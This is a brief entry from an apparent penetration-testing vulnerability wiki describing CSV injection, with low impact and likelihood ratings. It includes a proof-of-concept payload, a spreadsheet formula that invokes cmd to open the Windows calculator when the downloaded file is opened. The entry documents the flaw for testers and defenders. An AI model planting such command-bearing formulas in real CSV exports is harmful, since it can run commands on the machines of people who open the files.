Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

CSV Injection

POC

Import CSV with the following contents: Customer,Another =2+5+cmd|' /C calc'!A0,=2+5+cmd|' /C calc'!A0 Download the file to pop-up calculator on Windows

Impact

Low

Likelihood

Low